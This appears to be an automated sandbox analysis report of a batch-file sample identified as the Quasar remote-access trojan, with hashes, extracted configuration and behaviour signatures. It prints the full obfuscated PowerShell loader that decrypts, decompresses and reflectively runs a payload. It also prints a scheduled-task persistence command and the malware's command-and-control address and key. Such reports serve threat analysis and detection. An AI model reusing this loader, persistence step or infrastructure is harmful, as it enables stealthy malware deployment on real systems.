Analysis
-
max time kernel
133s -
max time network
136s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
24-06-2024 23:07
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win10v2004-20240611-en
General
-
Target
Uni.bat
-
Size
253KB
-
MD5
6116316574a1311a2e768ef21255430d
-
SHA1
684dec7251dbacf3e3b5a3cac0492df268f7f9a3
-
SHA256
f975a314f9f0ac6527acf5098bd0c9ce8800c05b83ce3c5af01c1cb8e3bbbd5b
-
SHA512
daf318e0dde57bf13b2b30bdff1556749caf3ebda2cffd5ead57c2c998aae763214226121f02996d48bcea54d53b9c2c352c21a8638b0d42f36c8f41896be2f2
-
SSDEEP
3072:PfaskbNKw91ey00VTUsMHdJmMQ5C6QCf8qb/qV3/PJHnigpqoineD/QrM47f9Jms:nef9NVbkd5UzZfYh6n7P7KK2X78EM
Malware Config
Extracted
quasar
3.0.1
Office04
wireless-boston.gl.at.ply.gg:41366
QSR_MUTEX_W1ckGYHOGswdBegmKd
-
encryption_key
QbY1WN4Surh1trMXzt97
-
install_name
system.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
system
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2952-34-0x000001D8C15C0000-0x000001D8C161E000-memory.dmp family_quasar -
Executes dropped EXE 2 IoCs
Processes:
Uni.bat.exesystem.exepid process 2952 Uni.bat.exe 4772 system.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 2 IoCs
Processes:
Uni.bat.exedescription ioc process File created C:\Windows\SysWOW64\SubDir\system.exe Uni.bat.exe File opened for modification C:\Windows\SysWOW64\SubDir\system.exe Uni.bat.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
Uni.bat.exesystem.exepid process 2952 Uni.bat.exe 2952 Uni.bat.exe 2952 Uni.bat.exe 4772 system.exe 4772 system.exe 4772 system.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Uni.bat.exesystem.exedescription pid process Token: SeDebugPrivilege 2952 Uni.bat.exe Token: SeDebugPrivilege 4772 system.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
cmd.exenet.exeUni.bat.exedescription pid process target process PID 612 wrote to memory of 2892 612 cmd.exe net.exe PID 612 wrote to memory of 2892 612 cmd.exe net.exe PID 2892 wrote to memory of 2316 2892 net.exe net1.exe PID 2892 wrote to memory of 2316 2892 net.exe net1.exe PID 612 wrote to memory of 2952 612 cmd.exe Uni.bat.exe PID 612 wrote to memory of 2952 612 cmd.exe Uni.bat.exe PID 2952 wrote to memory of 1616 2952 Uni.bat.exe schtasks.exe PID 2952 wrote to memory of 1616 2952 Uni.bat.exe schtasks.exe PID 2952 wrote to memory of 4772 2952 Uni.bat.exe system.exe PID 2952 wrote to memory of 4772 2952 Uni.bat.exe system.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵
-
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $LUjXk = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pfSAb in $LUjXk) { if ($pfSAb.StartsWith(':: ')) { $ysrPJ = $pfSAb.Substring(3); break; }; };$ydMoK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ysrPJ);$QmOjg = New-Object System.Security.Cryptography.AesManaged;$QmOjg.Mode = [System.Security.Cryptography.CipherMode]::CBC;$QmOjg.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$QmOjg.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8JDdwdCN8f9GIQeixAyEv80OWR2XU9cSTyINtWtC9E=');$QmOjg.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZMxKZ063xFXq46C7vuYyiQ==');$FoDTE = $QmOjg.CreateDecryptor();$ydMoK = $FoDTE.TransformFinalBlock($ydMoK, 0, $ydMoK.Length);$FoDTE.Dispose();$QmOjg.Dispose();$bzYHg = New-Object System.IO.MemoryStream(, $ydMoK);$EACsF = New-Object System.IO.MemoryStream;$cWBZp = New-Object System.IO.Compression.GZipStream($bzYHg, [IO.Compression.CompressionMode]::Decompress);$cWBZp.CopyTo($EACsF);$cWBZp.Dispose();$bzYHg.Dispose();$EACsF.Dispose();$ydMoK = $EACsF.ToArray();$fFqIs = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ydMoK);$sWumU = $fFqIs.EntryPoint;$sWumU.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\SubDir\system.exe"C:\Windows\SysWOW64\SubDir\system.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exeFilesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sh1eofh1.l0q.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
memory/2952-34-0x000001D8C15C0000-0x000001D8C161E000-memory.dmpFilesize
376KB
-
memory/2952-35-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB
-
memory/2952-16-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB
-
memory/2952-15-0x000001D8C1540000-0x000001D8C15B6000-memory.dmpFilesize
472KB
-
memory/2952-9-0x000001D8A9340000-0x000001D8A9362000-memory.dmpFilesize
136KB
-
memory/2952-32-0x000001D8C14C0000-0x000001D8C14F4000-memory.dmpFilesize
208KB
-
memory/2952-7-0x00007FFA76483000-0x00007FFA76484000-memory.dmpFilesize
4KB
-
memory/2952-14-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB
-
memory/2952-36-0x000001D8C1640000-0x000001D8C1652000-memory.dmpFilesize
72KB
-
memory/2952-37-0x000001D8C2E20000-0x000001D8C2E5E000-memory.dmpFilesize
248KB
-
memory/2952-94-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB
-
memory/4772-50-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB
-
memory/4772-77-0x0000019DD5140000-0x0000019DD517C000-memory.dmpFilesize
240KB
-
memory/4772-49-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB
-
memory/4772-96-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB
-
memory/4772-97-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB